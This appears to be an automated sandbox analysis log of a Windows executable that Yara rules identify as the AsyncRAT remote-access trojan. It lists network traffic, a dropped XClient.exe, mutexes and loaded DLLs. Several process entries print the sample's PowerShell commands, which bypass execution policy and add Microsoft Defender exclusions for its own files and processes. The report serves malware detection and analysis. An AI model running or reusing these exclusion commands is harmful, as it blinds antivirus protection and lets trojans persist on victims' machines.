                          Source: powershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2

                          Operating System Destruction

                          barindex
                          Protects its processes via BreakOnTermination flag
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: 01 00 00 00 Jump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: VJV2AjJ7Na.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD34695CF60_2_00007FFD34695CF6
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD346910FA0_2_00007FFD346910FA
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD34696AA20_2_00007FFD34696AA2
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD34691BB10_2_00007FFD34691BB1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD3469E0BC0_2_00007FFD3469E0BC
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD346925D30_2_00007FFD346925D3
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD346926D30_2_00007FFD346926D3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3469B9FA2_2_00007FFD3469B9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34695EFA2_2_00007FFD34695EFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3469BAFB2_2_00007FFD3469BAFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346956EA2_2_00007FFD346956EA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3469201D2_2_00007FFD3469201D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34693FFA2_2_00007FFD34693FFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34695BFA2_2_00007FFD34695BFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34696FFA2_2_00007FFD34696FFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3469B9535_2_00007FFD3469B953
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34691FD55_2_00007FFD34691FD5
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34693FFA5_2_00007FFD34693FFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34695BFA5_2_00007FFD34695BFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347639D15_2_00007FFD347639D1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34762E115_2_00007FFD34762E11
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3468356D8_2_00007FFD3468356D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34685ED38_2_00007FFD34685ED3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34685BF28_2_00007FFD34685BF2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34753CA88_2_00007FFD34753CA8
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD346621FA10_2_00007FFD346621FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3466B9FA10_2_00007FFD3466B9FA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34660E9D10_2_00007FFD34660E9D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD346656EA10_2_00007FFD346656EA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34660BAD10_2_00007FFD34660BAD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34665BFA10_2_00007FFD34665BFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34666FFA10_2_00007FFD34666FFA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347330E910_2_00007FFD347330E9
                          Source: VJV2AjJ7Na.exe, 00000000.00000000.2103695293.0000000000804000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs VJV2AjJ7Na.exe
                          Source: VJV2AjJ7Na.exeBinary or memory string: OriginalFilenameXClient.exe4 vs VJV2AjJ7Na.exe
                          Source: VJV2AjJ7Na.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: VJV2AjJ7Na.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: VJV2AjJ7Na.exe, llVL2VVPJ9sap5xkkujGTYTBVxb.csCryptographic APIs: 'TransformFinalBlock'
                          Source: VJV2AjJ7Na.exe, llVL2VVPJ9sap5xkkujGTYTBVxb.csCryptographic APIs: 'TransformFinalBlock'
                          Source: VJV2AjJ7Na.exe, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.csCryptographic APIs: 'TransformFinalBlock'
                          Source: XClient.exe.0.dr, llVL2VVPJ9sap5xkkujGTYTBVxb.csCryptographic APIs: 'TransformFinalBlock'
                          Source: XClient.exe.0.dr, llVL2VVPJ9sap5xkkujGTYTBVxb.csCryptographic APIs: 'TransformFinalBlock'
                          Source: XClient.exe.0.dr, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.csCryptographic APIs: 'TransformFinalBlock'
                          Source: VJV2AjJ7Na.exe, Dclwxq6mfdANal90RGxsbeoxR5awlvQz06uUP1YaZ9L0NzHmmAaFSgWj81yNHZwEMkYOjwLb7r6lSbYGDZKRo.csBase64 encoded string: 'Q5z0VXv61cBchtHKGCFACYiHuq339xFy9BTy5eIa2lN1nahsTD5kHJTb62j0'
                          Source: XClient.exe.0.dr, Dclwxq6mfdANal90RGxsbeoxR5awlvQz06uUP1YaZ9L0NzHmmAaFSgWj81yNHZwEMkYOjwLb7r6lSbYGDZKRo.csBase64 encoded string: 'Q5z0VXv61cBchtHKGCFACYiHuq339xFy9BTy5eIa2lN1nahsTD5kHJTb62j0'
                          Source: VJV2AjJ7Na.exe, NGwHDYzHApMBmpHhtkW6w5wNpRc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: VJV2AjJ7Na.exe, NGwHDYzHApMBmpHhtkW6w5wNpRc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: XClient.exe.0.dr, NGwHDYzHApMBmpHhtkW6w5wNpRc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: XClient.exe.0.dr, NGwHDYzHApMBmpHhtkW6w5wNpRc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@13/19@3/3
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeMutant created: \Sessions\1\BaseNamedObjects\WkXFk9DuzSngGyjx
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmi3xvi.024.ps1Jump to behavior
                          Source: VJV2AjJ7Na.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: VJV2AjJ7Na.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: VJV2AjJ7Na.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile read: C:\Users\user\Desktop\VJV2AjJ7Na.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\VJV2AjJ7Na.exe "C:\Users\user\Desktop\VJV2AjJ7Na.exe"
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
